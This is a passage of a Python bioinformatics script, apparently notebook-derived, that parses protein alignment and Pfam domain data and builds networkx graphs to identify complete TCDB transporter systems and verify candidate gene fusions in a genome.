                pfam_dic[qname][pacc]['clan'] = clan_dic[pacc]
            else:
                # Accumulate additional envelopes, de-duplicate and keep sorted.
                pfam_dic[qname][pacc]['cood'].append([int(row['efrom']),int(row['eto'])])
                pfam_dic[qname][pacc]['cood'] = list(map(list, unique(map(tuple, pfam_dic[qname][pacc]['cood']))))
                pfam_dic[qname][pacc]['cood'].sort()
    return pfam_dic
def get_cood(qacc, sacc, address):
    """Read the ssearch36 output for a (query, subject) pair and return the
    alignment coordinates as ([q_start, q_end], [s_start, s_end]).

    The summary line has the form:
        Smith-Waterman ... overlap (s_start-s_end:q_start-q_end)
    The ':genome'/':tcdb' tags on the accessions are stripped because the
    on-disk directory names use the bare accessions.
    """
    q_name = qacc.split(":")[0]
    s_name = sacc.split(":")[0]
    ssearch = os.path.join(
        address,
        'plots/{}_vs_{}/ssearch_{}_vs_{}/files/ssearch36.out'.format(
            q_name, s_name, s_name, q_name))
    summary = ''
    with open(ssearch, "r") as handle:
        for row in handle:
            if row.startswith("Smith-Waterman"):
                summary = row
                break
    inside = summary.split('overlap')[1]
    pieces = inside.split(':')
    s_span = pieces[0].split('(')[1]
    q_span = pieces[1].split(')')[0]
    s_cood = [int(s_span.split('-')[0]), int(s_span.split('-')[1])]
    q_cood = [int(q_span.split('-')[0]), int(q_span.split('-')[1])]
    return q_cood, s_cood
def alignment_has_domain(qacc, sacc, pfam_dic, address):
    """Classify the qacc-vs-sacc alignment with respect to Pfam domains.

    Returns a two-element list of booleans:
      [False, False] -> at least one protein has no domain overlapping
                        (or no domain info at all inside) the alignment
      [True,  False] -> both sides have domains in the aligned region, but
                        none in common
      [True,  True ] -> the aligned regions share at least one domain

    pfam_dic (built by get_info) is keyed by the *untagged* accession, so
    look-ups must use the stripped names.
    """
    true_qacc = qacc.split(":")[0]
    true_sacc = sacc.split(":")[0]
    q_cood, s_cood = get_cood(qacc, sacc, address)  # alignment coordinates
    # Bug fix: the original tested the possibly-tagged qacc/sacc against
    # pfam_dic, so any accession carrying a ':genome'/':tcdb' tag never
    # matched and was always reported as having no domain information.
    if true_qacc not in pfam_dic or true_sacc not in pfam_dic:
        return [False, False]
    q_domains = list(pfam_dic[true_qacc].keys())
    s_domains = list(pfam_dic[true_sacc].keys())
    # Collect, on each side, the domains whose envelope overlaps the
    # aligned region (partial overlap on either end, or full containment).
    qdwa = []
    sdwa = []
    for qdacc in q_domains:
        for loc in pfam_dic[true_qacc][qdacc]['cood']:
            if (loc[0] <= q_cood[1] and loc[0] >= q_cood[0]) or (loc[1] <= q_cood[1] and loc[1] >= q_cood[0]) or (loc[1] > q_cood[1] and loc[0] < q_cood[0]):
                qdwa.append(qdacc)
    for sdacc in s_domains:
        for loc in pfam_dic[true_sacc][sdacc]['cood']:
            if (loc[0] <= s_cood[1] and loc[0] >= s_cood[0]) or (loc[1] <= s_cood[1] and loc[1] >= s_cood[0]) or (loc[1] > s_cood[1] and loc[0] < s_cood[0]):
                sdwa.append(sdacc)
    if len(qdwa) == 0 or len(sdwa) == 0:
        return [False, False]  # one side has no domain within the alignment
    # Any domain in common between the two aligned regions?
    if set(qdwa) & set(sdwa):
        return [True, True]
    return [True, False]
def domain_extension(qacc,sacc,pfam_dic,address):
    """Extend the alignment coordinates outwards to cover shared domains.

    Starting from the ssearch alignment span on each protein, grow the
    interval so that any Pfam domain occurring on BOTH proteins and
    overlapping the alignment is fully included. Returns the extended
    coordinates (qde, sde) as [start, end] lists, one per protein.
    Assumes both accessions are present in pfam_dic (keys are untagged).
    """
    qacc = qacc.split(":")[0] # get rid of the ':'
    sacc = sacc.split(":")[0]
    q_cood,s_cood = get_cood(qacc, sacc,address) # get the alignment coordinates
    # qde/sde start as a second copy of the alignment span and are widened.
    qde,sde = get_cood(qacc, sacc,address)
    q_domains = list(pfam_dic[qacc].keys())
    s_domains = list(pfam_dic[sacc].keys())
    # check if domain exists in both alignments and if there is a common domain
    qdwa = []
    sdwa = []
    for qdacc in q_domains:
        for loc in pfam_dic[qacc][qdacc]['cood']:
            if (loc[0] <= q_cood[1] and loc[0] >= q_cood[0]) or (loc[1] <= q_cood[1] and loc[1] >= q_cood[0]) or (loc[1] > q_cood[1] and loc[0] < q_cood[0]):
                qdwa.append(qdacc)
    for sdacc in s_domains:
        for loc in pfam_dic[sacc][sdacc]['cood']:
            if (loc[0] <= s_cood[1] and loc[0] >= s_cood[0]) or (loc[1] <= s_cood[1] and loc[1] >= s_cood[0]) or (loc[1] > s_cood[1] and loc[0] < s_cood[0]):
                sdwa.append(sdacc)
    # Domains shared by the two aligned regions drive the extension.
    intersact = list(set(qdwa) & set(sdwa))
    for i in intersact:
        for coods in pfam_dic[qacc][i]['cood']:
            # Skip envelopes that do not touch the alignment at all.
            if coods[1] < q_cood[0]:
                continue
            if coods[0] > q_cood[1]:
                continue
            # Envelope sticks out on the left: push the start earlier.
            if coods[0] < q_cood[0] and coods[1] < q_cood[1] and coods[0] < qde[0]:
                qde[0] = coods[0]
            # Envelope sticks out on the right: push the end later.
            if coods[0] < q_cood[1] and coods[1] > q_cood[1] and coods[1] > qde[1]:
                qde[1] = coods[1]
        for coods in pfam_dic[sacc][i]['cood']:
            if coods[1] < s_cood[0]:
                continue
            if coods[0] > s_cood[1]:
                continue
            if coods[0] < s_cood[0] and coods[1] < s_cood[1] and coods[0] < sde[0]:
                sde[0] = coods[0]
            if coods[0] < s_cood[1] and coods[1] > s_cood[1] and coods[1] > sde[1]:
                sde[1] = coods[1]
    return qde,sde
def count_complete_systems(G, nodes):
    """Count the 'system' nodes of G that check_complete reports as
    complete. *nodes* is the raw-network attribute dict consulted by
    check_complete."""
    system_ids = (node for node, data in G.nodes(data=True)
                  if data['attr_dic']['tp'] == 'system')
    return sum(1 for sys_id in system_ids if check_complete(nodes, G, sys_id)[0])
def get_gene_feature(gene_feature_file):#TODO: detect accession for repeats and get rid of ':tcdb/:genome' #TODO: add feature for accession column specification
    """Extract CDS coordinates from a (gzipped) feature table via zgrep.

    Shells out `zgrep CDS <file> | cut -f 8,9,10,11` and interprets the
    four whitespace-separated fields per CDS as: start, end, strand,
    accession/locus_tag (version suffix after '.' dropped).
    Returns {accession: {'strand': str, 'start': int, 'end': int}},
    with insertion order sorted by start coordinate.
    NOTE(review): relies on the NCBI feature-table column layout implied
    by the cut fields — confirm for other input formats.
    """
    stdoutdata = subprocess.getoutput("zgrep CDS {} | cut -f 8,9,10,11".format(gene_feature_file))
    #a = subprocess.Popen("zgrep gene {} | cut -f 8,9,10,17".format(gene_feature_file), stdout=subprocess.PIPE)
    data = stdoutdata.split()
    #print(data)
    gene_feature = []
    # Fields arrive flattened; consume them four at a time.
    for i in range(int(len(data)/4)):
        index = i*4
        gene_feature.append([data[index+3].split(".")[0],data[index+2],int(data[index]),int(data[index+1])])
    # gene_accession/locus_tag, strand, start, end
    gene_feature.sort(key=lambda x: x[2]) # sort by the left coordinate
    # return a dic
    gene_dic = {}
    for gene in gene_feature:
        gene_dic[gene[0]] = {'strand':gene[1],'start':gene[2],'end':gene[3]}
    return gene_dic
def get_strand(gene_dic, gacc):
    """Return the strand recorded for gene *gacc* in *gene_dic*
    (as produced by get_gene_feature)."""
    entry = gene_dic[gacc]
    return entry['strand']
def get_genetic_distance(gene_dic, gacc_list, condition):
    """Pairwise genetic distance (number of genes apart, by position in
    gene_dic's insertion order) for every pair in *gacc_list*.

    condition == 'linear' uses the plain index difference; any other
    value treats the genome as circular and takes the shorter way
    around. Tags after ':' on the accessions are ignored when locating
    genes. With fewer than two accessions, returns the single accession
    at distance 0 from itself.
    """
    if len(gacc_list) < 2:
        return {gacc_list[0]: {gacc_list[0]: 0}}
    position = {name: pos for pos, name in enumerate(gene_dic)}
    genome_size = len(position)
    distances = {}
    for first in gacc_list:
        row = {}
        for second in gacc_list:
            gap = abs(position[first.split(":")[0]] - position[second.split(":")[0]])
            if condition != 'linear':
                # circular genome: wrap around if that is shorter
                gap = min(gap, genome_size - gap)
            row[second] = gap
        distances[first] = row
    return distances
#eg: et_genetic_distance(gene_dic, gacc_list=['Dmul_00010','Dmul_02460','Dmul_04350'], condition='linear')
# return: {'Dmul_00010': {'Dmul_00010': 0, 'Dmul_02460': 252, 'Dmul_04350': 440},
# 'Dmul_02460': {'Dmul_00010': 252, 'Dmul_02460': 0, 'Dmul_04350': 188},
#. 'Dmul_04350': {'Dmul_00010': 440, 'Dmul_02460': 188, 'Dmul_04350': 0}}
# In[4]:
def generate_weight(qacc, sacc, evalue, qcov, scov, pfam_dic, address):
    """Convert an alignment into an integer edge weight in [0, 100].

    A confidence score in [0, 1] combines a tiered -log10(evalue) term,
    the larger of the two coverages, and the Pfam-domain agreement of the
    aligned regions (see alignment_has_domain). The returned weight is
    int((1 - confidence) * 100): the lower the weight, the better the
    candidate, so shortest-path searches favour strong hits. Using only
    the larger coverage deliberately keeps plausible fusion fragments
    attractive even when the other side covers ~50%.
    """
    log_eval = 100 if evalue == 0 else -1 * math.log(evalue, 10)
    # Tiered normalisation of the e-value signal.
    if log_eval >= 30:
        tier = 1
    elif log_eval >= 11:
        tier = 0.8
    elif log_eval >= 7:
        tier = 0.6
    else:
        tier = 0.4
    best_cov = max(scov, qcov) / 100
    has_domain, shares_domain = alignment_has_domain(qacc, sacc, pfam_dic, address)
    if not has_domain:
        # No usable domain evidence: rely on e-value and coverage alone.
        confidence = 0.5 * tier + 0.5 * best_cov
    elif shares_domain:
        # Shared domains inside the alignment earn a flat 0.5 bonus.
        confidence = 0.25 * tier + 0.25 * best_cov + 0.5
    else:
        # Domains present on both sides but none in common: penalise.
        print('punish_case: '+qacc + ', '+sacc)
        confidence = 0.25 * tier + 0.25 * best_cov
    return int((1 - confidence) * 100)
# In[5]:
def add_system(nodes, edges, T_com, tcid, S):
    """Copy system *tcid* — with its hit components and their candidate
    proteins — from the raw network into subgraph S.

    *nodes*/*edges* are the attribute dictionaries of the raw network
    (flat schema: node attrs stored directly), and T_com supplies the
    topology. Components listed in the system's TCDB definition but
    absent from the raw table are reported rather than added. No-op if
    the system is already present in S.
    """
    if tcid in S:
        return
    S.add_node(tcid, attr_dic=nodes[tcid])
    hit_components = list(T_com.predecessors(tcid))
    for component in hit_components:
        if component not in S:
            S.add_node(component, attr_dic=nodes[component])
        S.add_edge(component, tcid, attr_dic=edges[(component, tcid)])
        for candidate in list(T_com.predecessors(component)):
            if candidate not in S:
                S.add_node(candidate, attr_dic=nodes[candidate])
            S.add_edge(candidate, component, attr_dic=edges[(candidate, component)])
    # Components without any genome hit hang directly below the system.
    if len(hit_components) != len(nodes[tcid]['components']):
        for missing in nodes[tcid]['components']:
            if missing not in S and missing in nodes:
                S.add_node(missing, attr_dic=nodes[missing])
                S.add_edge(tcid, missing, attr_dic=edges[(tcid, missing)])
            elif missing not in nodes:
                print("Data incoherent! {} is in TCDB but not in the raw table!".format(missing))
def add_system_v2(nodes, edges, T_com, tcid, S):
    """Like add_system, but for networks whose node attributes are nested
    under an 'attr_dic' key (i.e. nodes built from `DiGraph.nodes(data=True)`).
    Components without hits are attached with a synthetic {'tp': 'nohit'}
    edge instead of a raw-table edge. No-op if *tcid* is already in S."""
    if tcid in S:
        return
    S.add_node(tcid, attr_dic=nodes[tcid]['attr_dic'])
    hit_components = list(T_com.predecessors(tcid))
    for component in hit_components:
        if component not in S:
            S.add_node(component, attr_dic=nodes[component]['attr_dic'])
        S.add_edge(component, tcid, attr_dic=edges[(component, tcid)])
        for candidate in list(T_com.predecessors(component)):
            if candidate not in S:
                S.add_node(candidate, attr_dic=nodes[candidate]['attr_dic'])
            S.add_edge(candidate, component, attr_dic=edges[(candidate, component)])
    # Components with no genome hit get a marker edge below the system.
    if len(hit_components) != len(nodes[tcid]['attr_dic']['components']):
        for missing in nodes[tcid]['attr_dic']['components']:
            if missing not in S:
                S.add_node(missing, attr_dic=nodes[missing]['attr_dic'])
                S.add_edge(tcid, missing, attr_dic={'tp': 'nohit'})
# In[19]:
def show_subnetwork(T,raw_tree, node_list,gene_feature_file,address,condition='linear',name='isolated_system.html',raw_network=False): # T is a refined tree that certain systems has been selected
    """Build and render the subnetwork of T induced by *node_list*.

    For each requested system node, copies the system, its components and
    their candidates from T into a fresh DiGraph (components defined in
    TCDB but absent from T become 'nohit' placeholders). For each
    requested candidate ('subject') node, pulls in every system reachable
    through shared candidates (transitive closure over candidate/component
    links). The result is handed to network_visualization_v2 for HTML
    output. Node/edge attributes are taken from *raw_tree*, whose nodes
    use the nested {'attr_dic': ...} schema.
    """
    H = nx.DiGraph() # the original tree generated from the table must be provided
    nodes = dict(raw_tree.nodes(data=True))
    edges = dict(((u,v),e) for u,v,e in raw_tree.edges(data=True))
    candidates = [x for x,y in T.nodes(data=True) if y['attr_dic']['tp'] == 'subject']
    systems = [x for x,y in T.nodes(data=True) if y['attr_dic']['tp'] == 'system']
    for nacc in node_list:
        if nacc in systems and nacc not in H:
            # Requested node is a system: copy it with components+candidates.
            H.add_node(nacc,attr_dic=nodes[nacc]['attr_dic'])
            for cpt in list(T.predecessors(nacc)):
                H.add_node(cpt,attr_dic=nodes[cpt]['attr_dic'])
                H.add_edge(cpt,nacc,attr_dic=edges[cpt,nacc])
                for cand in list(T.predecessors(cpt)):
                    if cand not in H:
                        H.add_node(cand,attr_dic=nodes[cand]['attr_dic'])
                        H.add_edge(cand,cpt,attr_dic=edges[cand,cpt])
            if len(list(T.successors(nacc))) > 0: # consider incomplete trees
                for cpt in list(T.successors(nacc)):
                    H.add_node(cpt,attr_dic=nodes[cpt]['attr_dic'])
                    H.add_edge(nacc,cpt,attr_dic=edges[nacc,cpt])
            # Components defined in TCDB but never hit become placeholders.
            if len(list(T.predecessors(nacc))) != len(nodes[nacc]['attr_dic']['components']):
                for mcpt in nodes[nacc]['attr_dic']['components']:
                    if mcpt not in H:
                        H.add_node(mcpt,attr_dic={'tp':'nohit'})
                        H.add_edge(nacc,mcpt,attr_dic={'tp':'nohit'})
        elif nodes[nacc]['attr_dic']['tp']=='subject' and nacc not in H :
            # Requested node is a candidate protein: collect every system
            # connected to it through shared candidates (the linked_sys
            # list grows while being iterated, giving a transitive closure).
            first_cpt = list(T.successors(nacc))[0]
            first_tcid = list(T.successors(first_cpt))[0]
            linked_sys = [first_tcid]
            for ls in linked_sys:
                if ls in T:
                    for cpt in list(T.predecessors(ls)):
                        for cand in list(T.predecessors(cpt)):
                            for cp in list(T.successors(cand)):
                                p_sys = list(T.successors(cp))[0]
                                if p_sys not in linked_sys:
                                    linked_sys.append(p_sys)
            for ls in linked_sys:
                add_system_v2(nodes,edges,T,ls,H)
    network_visualization_v2(H,gene_feature_file,address,condition,name,raw_network)
# In[7]:
def get_tcdic(tvt_out, percent):
    """Parse a TCDB-vs-TCDB blastp table (``-outfmt 7``) into a dict
    mapping each query accession to the subject accessions whose
    alignment leaves at most *percent* (fraction, e.g. 0.24) of BOTH
    sequences unaligned at either end. Self hits and comment lines are
    skipped. Identifiers are expected as '<tcid>-<accession>'.

    Fix: the input file handle is now closed deterministically (the
    original opened it and never closed it).
    """
    tdic = {}
    with open(tvt_out, 'r') as tvt:
        for line in tvt:
            if '#' in line:  # header/comment rows emitted by -outfmt 7
                continue
            li = line.split()
            q = li[0].split('-')[1]
            s = li[1].split('-')[1]
            if q == s:  # self hit
                continue
            qstart, qend, qlen = int(li[2]), int(li[3]), int(li[4])
            sstart, send, slen = int(li[5]), int(li[6]), int(li[7])
            # Largest unaligned tail as a fraction of the sequence length.
            qmaxunalign = max(qstart - 1, qlen - qend) / qlen
            smaxunalign = max(sstart - 1, slen - send) / slen
            if qmaxunalign <= percent and smaxunalign <= percent:
                tdic.setdefault(q, []).append(s)
    return tdic
# In[8]:
def CrossValidation(q, s, tcdic, G):
    """Cross-validate a suspected fusion edge: return True if candidate
    protein *s* also has a non-fusion hit to some other component that
    TCDB-internal blast (tcdic) links back to component *q*."""
    for other_component in list(G.successors(s)):
        if other_component == q:
            continue
        if G[s][other_component]['fusion'] != False:
            continue
        linked = tcdic.get(other_component)
        if linked is not None and q in linked:
            return True
    return False
# In[9]:
def verify_fusion(G, address):
    """Verify suspected fusion edges in the raw network and mark them.

    Two cases are examined:
      1. Candidate protein larger than the components: if it fusion-hits
         several different components of the SAME system and those hits
         land on (mostly) non-overlapping stretches of the candidate
         (overlap <= 50% of the combined span), the fusion is 'verified'.
      2. Component larger than the candidates: symmetric test on the
         component's coordinates for components with exactly one system.
    Verified edges get fusion_bonus = 50 and
    fusion_verification = 'verified' (mutated in place on G).

    Bug fix: the per-system loop below previously indexed hit_dic with
    the stale loop variable `hit_sys` (left over from the counting loop)
    instead of the current key `hit`, so when a candidate hit multiple
    systems only the last-counted system's components were examined.
    """
    cands = [x for x, y in G.nodes(data=True) if y['tp'] == 'subject']
    for cand in cands:
        outgoing_edges = G.out_edges(cand, data=True)
        fusion_edges = [ie for ie in outgoing_edges if ie[2]['fusion'] == True]
        if len(fusion_edges) == 0:
            continue
        candil = [fe for fe in fusion_edges if fe[2]['qcov'] > fe[2]['scov']]  # candidate is larger
        if len(candil) == 0:
            continue
        else:  # determine if the candidate hit multiple different components in the same system
            # group the fusion hits by the system each component belongs to
            hit_dic = {}
            for cdil in candil:
                hit_sys = list(G.successors(cdil[1]))[0]
                if hit_sys not in hit_dic:
                    hit_dic[hit_sys] = {}
                    hit_dic[hit_sys]['cpts'] = [cdil[1]]
                    hit_dic[hit_sys]['counts'] = 1
                else:
                    hit_dic[hit_sys]['cpts'].append(cdil[1])
                    hit_dic[hit_sys]['counts'] = hit_dic[hit_sys]['counts'] + 1
            for hit in hit_dic:
                if hit_dic[hit]['counts'] == 1:
                    continue
                else:  # verify true fusion
                    complemant = False
                    s_cood_mark = []
                    # Fixed: use `hit` (current system), not the stale `hit_sys`.
                    for cpt in hit_dic[hit]['cpts']:
                        if complemant == True:
                            continue
                        q_cood, s_cood = get_cood(cpt, cand, address)
                        if len(s_cood_mark) == 0:
                            s_cood_mark = s_cood
                        else:
                            if s_cood[0] > s_cood_mark[1] or s_cood_mark[0] > s_cood[1]:  # no overlap
                                complemant = True
                            elif (s_cood[0] < s_cood_mark[0] and s_cood[1] > s_cood_mark[1]) or (s_cood[0] > s_cood_mark[0] and s_cood[1] < s_cood_mark[1]):
                                # full containment: not complementary
                                complemant = False
                            else:  # partial overlap
                                overlap_cood = s_cood + s_cood_mark
                                # check the overlap of coordinates
                                overlap_cood.sort()
                                if (overlap_cood[2] - overlap_cood[1]) / (overlap_cood[3] - overlap_cood[0]) <= 0.5:
                                    complemant = True
                    if complemant == True:  # mark all edges of this system as verified
                        for cpt in hit_dic[hit]['cpts']:
                            G[cand][cpt]['fusion_bonus'] = 50
                            G[cand][cpt]['fusion_verification'] = 'verified'
    # deal with situation that component is larger
    cpts = [x for x, y in G.nodes(data=True) if y['tp'] == 'component' and len(list(G.successors(x))) == 1]
    for comp in cpts:
        in_edges = G.in_edges(comp, data=True)
        fusion_edges = [ie for ie in in_edges if ie[2]['fusion'] == True]
        if len(fusion_edges) == 0:
            continue
        compil = [fe for fe in fusion_edges if fe[2]['qcov'] < fe[2]['scov']]  # component is larger
        if len(compil) == 0:
            continue
        elif len(compil) == 1:  # single hit: nothing to complement
            continue
        else:  # determine overlap on the component's coordinates
            complemant = False
            q_cood_mark = []
            for cpil in compil:
                if complemant == True:
                    continue
                q_cood, s_cood = get_cood(comp, cpil[0], address)
                if len(q_cood_mark) == 0:
                    q_cood_mark = q_cood
                else:
                    if q_cood[0] > q_cood_mark[1] or q_cood_mark[0] > q_cood[1]:  # no overlap
                        complemant = True
                    elif (q_cood[0] < q_cood_mark[0] and q_cood[1] > q_cood_mark[1]) or (q_cood[0] > q_cood_mark[0] and q_cood[1] < q_cood_mark[1]):
                        complemant = False
                    else:
                        overlap_cood = q_cood + q_cood_mark
                        overlap_cood.sort()
                        if (overlap_cood[2] - overlap_cood[1]) / (overlap_cood[3] - overlap_cood[0]) <= 0.5:
                            complemant = True
            if complemant == True:
                for cpil in compil:
                    G[cpil[0]][comp]['fusion_bonus'] = 50
                    G[cpil[0]][comp]['fusion_verification'] = 'verified'
# In[10]:
def initialize_raw_network(df,repeats,pdic,tcdb,address,pog=0.24):
    """Build the raw directed network from the hit table *df*.

    Node types: 'subject' (genome protein), 'component' (TCDB protein),
    'system' (tcid). Edges: subject->component ('q_vs_s', weighted by
    generate_weight, with a fusion flag), component->system ('hit'), and
    system->component ('nohit') for components with no genome hit.
    On first run, extracts the needed TCDB entries with blastdbcmd and
    runs an all-vs-all blastp to create 'tcdb_vs_tcdb.out', which feeds
    the fusion cross-validation (see get_tcdic / CrossValidation).
    An edge is initially marked fusion=True when the largest unaligned
    stretch exceeds 23% of either sequence and domain extension cannot
    rescue the alignment; CrossValidation and verify_fusion then refine
    those marks. Returns the networkx DiGraph.
    NOTE(review): requires blastdbcmd/blastp on PATH and a 'tcdb' blast
    database in the working directory — confirm in deployment docs.
    """
    if not os.path.isfile('tcdb_vs_tcdb.out'):
        # One-off: dump all referenced TCDB entries and blast them
        # against each other for the fusion cross-validation table.
        tc_components = list(set((df['tcid'] + '-'+df['query_accession']).tolist()))
        out = open('tcdb_entries.faa', 'wb')
        for tc in tc_components:
            p = subprocess.Popen('blastdbcmd -db tcdb -entry {} -target_only'.format(tc), stdout=subprocess.PIPE, stderr = subprocess.PIPE, shell=True)
            for line in p.stdout:
                out.write(line)
        os.system("blastp -query tcdb_entries.faa -subject tcdb_entries.faa -use_sw_tback -out tcdb_vs_tcdb.out -evalue 1e-6 -outfmt '7 qacc sacc qstart qend qlen sstart send slen length evalue pident'")
    tcdic = get_tcdic('tcdb_vs_tcdb.out',pog)
    G = nx.DiGraph()
    mc = get_mc(tcdb,repeats)
    fusion_candidates = []
    for index,row in df.iterrows():
        if not math.isnan(float(row['evalue'])):
            # Row represents a genome-vs-TCDB hit.
            if row['tcid'] not in G:
                G.add_node(row['tcid'],tp='system',components=mc[row['tcid']])
            if row['subject_accession'] not in G:
                G.add_node(row['subject_accession'],tp='subject', length = row['subject_length'],tms = row['subject_tms'])
            if row['query_accession'] not in G:
                G.add_node(row['query_accession'],tp='component', length = row['query_length'],tms = row['query_tms'])
            # assign potential fusions
            # definition: largest unaligned potion/lengh > 23%
            q_cood,s_cood = get_cood(row['query_accession'], row['subject_accession'], address)
            # Locate the larger unaligned tail on each sequence.
            if q_cood[0]-0 > row['query_length']-q_cood[1]:
                q_max_unalign = [0,q_cood[0]]
            else:
                q_max_unalign = [q_cood[1],row['query_length']]
            if s_cood[0]-0 > row['subject_length']-s_cood[1]:
                s_max_unalign = [0,s_cood[0]]
            else:
                s_max_unalign = [s_cood[1],row['subject_length']]
            q_portion = (q_max_unalign[1]-q_max_unalign[0])/row['query_length']
            s_portion = (s_max_unalign[1]-s_max_unalign[0])/row['subject_length']
            ds = alignment_has_domain(row['query_accession'], row['subject_accession'],pdic,address)
            if (q_portion <= 0.23 and s_portion <= 0.23):
                # Both tails small: clearly not a fusion.
                G.add_edge(row['subject_accession'],row['query_accession'],tp = 'q_vs_s',evalue=row['evalue'],qcov = row['query_coverage'],scov =row['subject_coverage'],fusion=False,weight=generate_weight(row['query_accession'],row['subject_accession'],row['evalue'],
                        row['query_coverage'],row['subject_coverage'],pdic,address),fusion_bonus=0,fusion_verification = '')
            elif ds[0] == True and ds[1] == True:
                # Shared domains: try to rescue via domain extension before
                # declaring a fusion.
                qde,sde = domain_extension(row['query_accession'], row['subject_accession'],pdic,address)
                if (qde[1]-qde[0])/row['query_length'] >= 0.77 and (qde[1]-qde[0])/(q_cood[1]-q_cood[0]) <=2 and (sde[1]-sde[0])/row['subject_length'] >= 0.77 and (sde[1]-sde[0])/(s_cood[1]-s_cood[0]) <= 2:
                    G.add_edge(row['subject_accession'],row['query_accession'],tp = 'q_vs_s',evalue=row['evalue'],qcov = row['query_coverage'],scov =row['subject_coverage'],fusion=False,weight=generate_weight(row['query_accession'],row['subject_accession'],row['evalue'],
                        row['query_coverage'],row['subject_coverage'],pdic,address),fusion_bonus=0,fusion_verification = '')
                else:
                    G.add_edge(row['subject_accession'],row['query_accession'],tp = 'q_vs_s',evalue=row['evalue'],qcov = row['query_coverage'],scov =row['subject_coverage'],fusion=True,weight=generate_weight(row['query_accession'],row['subject_accession'],row['evalue'],
                        row['query_coverage'],row['subject_coverage'],pdic,address),fusion_bonus=0,fusion_verification = '')
                    fusion_candidates.append([row['subject_accession'],row['query_accession']])
            else:
                G.add_edge(row['subject_accession'],row['query_accession'],tp = 'q_vs_s',evalue=row['evalue'],qcov = row['query_coverage'],scov =row['subject_coverage'],fusion=True,weight=generate_weight(row['query_accession'],row['subject_accession'],row['evalue'],
                        row['query_coverage'],row['subject_coverage'],pdic,address),fusion_bonus=0,fusion_verification = '')
                fusion_candidates.append([row['subject_accession'],row['query_accession']])
            G.add_edge(row['query_accession'],row['tcid'],tp = 'hit',title='',weight=1)
        else:
            # No genome hit for this component: record it under its system.
            if row['tcid'] not in G:
                G.add_node(row['tcid'],tp='system',components=mc[row['tcid']])
            G.add_node(row['query_accession'],tp='component', length = row['query_length'],tms = row['query_tms'])
            G.add_edge(row['tcid'],row['query_accession'],tp='nohit',title='Nohit',weight=1)
    # Un-mark fusions that TCDB-internal blast explains away.
    for fc in fusion_candidates:
        if CrossValidation(fc[1],fc[0],tcdic,G) == True:
            G[fc[0]][fc[1]]['fusion'] = False
    # add fusion bonus to the raw network
    verify_fusion(G,address)
    print(G)
    return G
# In[11]:
def check_complete(nodes, G, s):
    """Return [is_complete, missing] for system node *s* of graph G.

    *nodes* maps node name -> attribute dict (flat schema with a
    'components' list for systems). A system is incomplete when some
    TCDB component is absent from G, or when a present component has no
    candidate protein; *missing* lists the offending components.
    """
    expected = nodes[s]['components']
    present = list(G.predecessors(s))
    if len(expected) != len(present):
        absent = [cpt for cpt in expected if cpt not in present]
        return [False, absent]
    unsupported = [cpt for cpt in present if len(list(G.predecessors(cpt))) == 0]
    return [len(unsupported) == 0, unsupported]
# recommend system , returns two new trees that attributes are different than the original tree. added attr_dic = {all original attributes}
def raw_recom(H,gene_dic,degree_of_tolerance=2,condition='linear'):
    """Stage-2 recommendation pass over the raw network *H*.

    Builds raw_com, a subgraph holding only the systems already complete in H,
    then runs a shortest-path (Dijkstra) walk from every candidate in raw_com
    and keeps only the hit edges lying on paths no longer than the shortest
    component distance + degree_of_tolerance.  Surviving edges/nodes populate
    the recommended network T.  Systems missing at most 4 components are also
    carried into T so later stages can try to complete them.  Prints a report
    per system and returns T.

    gene_dic / condition are carried for genetic-distance semantics elsewhere;
    degree_of_tolerance widens the path-length cutoff.
    """
    nodes = dict(H.nodes(data=True))
    edges = dict(((u,v),e) for u,v,e in H.edges(data=True))
    candidates = [x for x,y in H.nodes(data=True) if y['tp'] == 'subject']
    systems = [x for x,y in H.nodes(data=True) if y['tp'] == 'system']
    cpts = [x for x,y in H.nodes(data=True) if y['tp'] == 'component']
    raw_com = nx.DiGraph() # build up a network that contains only complete systems found from the raw_network
    T = nx.DiGraph() # inlcudes every node, but structures/edges are re-assinged/discarded after the recommand process
    for s in systems:
        situation = check_complete(nodes,H,s)
        if situation[0] == True: # also add possible incomplete systems
            add_system(nodes,edges,H,s,raw_com)
    raw_com_candidates = [x for x,y in raw_com.nodes(data=True) if y['attr_dic']['tp'] == 'subject']
    for c in raw_com_candidates:
        length,path = nx.single_source_dijkstra(raw_com,c)
        #print (length)
        # get the shortest lengh & path of a system + degree_of_tolerance
        node = list(length.keys())
        cpts_len = {k:length[k] for k in node if k in cpts}
        #sys_path = {k:path[k] for k in node if k in systems}
        # check if multiple len recorded in the system and choose the shortest lengths
        key_min = min(cpts_len.keys(), key=(lambda k: cpts_len[k]))
        adj_len = cpts_len[key_min] + degree_of_tolerance
        #print(adj_len)
        cpts_len_con = {k:cpts_len[k] for k in cpts_len if cpts_len[k]<=adj_len}
        for nd in cpts_len_con:
            for n in path[nd]:
                if n not in T:
                    T.add_node(n,attr_dic=nodes[n])
            # check if edge has already been added
            # NOTE(review): only the first hop of the path is added here — confirm intended
            if not T.has_edge(path[nd][0],path[nd][1]):
                T.add_edge(path[nd][0],path[nd][1],attr_dic=edges[path[nd][0],path[nd][1]])
            tcnode = list(H.successors(nd))[0]
            if tcnode not in T:
                T.add_node(tcnode,attr_dic=nodes[tcnode])
            if not T.has_edge(nd,tcnode):
                T.add_edge(nd,tcnode,attr_dic=edges[(nd,tcnode)])
    #systems = [x for x,y in H.nodes(data=True) if y['tp'] == 'system']
    raw_com_systems = [x for x,y in raw_com.nodes(data=True) if y['attr_dic']['tp'] == 'system']
    incom = 0
    # report every previously-complete system that survives in T
    for s in raw_com_systems:
        situation = check_complete(nodes,T,s)
        if situation[0] == True:
            print(s + ' is complete: ')
            for cpt in list(T.predecessors(s)):
                if len(list(T.predecessors(cpt))) > 0:
                    print('component '+cpt+' has candidates: ')
                    for cand in list(T.predecessors(cpt)):
                        if edges[(cand,cpt)]['fusion'] == True:
                            print(cand+'( fusion' +' '+ edges[(cand,cpt)]['fusion_verification']+' )')
                        else:
                            print(cand)
                else:
                    print('component '+cpt+' has no candidates!')
            print('\n')
    # carry near-complete systems (at most 4 missing components) into T as well
    for s in systems:
        situation = check_complete(nodes,H,s)
        if situation[0] == False and len(situation[1])<=4: # also add possible incomplete systems
            add_system(nodes,edges,H,s,T)
            incom += 1
            print(s + ' is incomplete: ')
            for cpt in list(T.predecessors(s)):
                print('component '+cpt+' has candidates: ')
                for cand in list(T.predecessors(cpt)):
                    if edges[(cand,cpt)]['fusion'] == True:
                        print(cand+'( fusion' +' '+ edges[(cand,cpt)]['fusion_verification']+' )')
                    else:
                        print(cand)
            for mcpt in list(T.successors(s)):
                print('component '+mcpt+' has no candidates!')
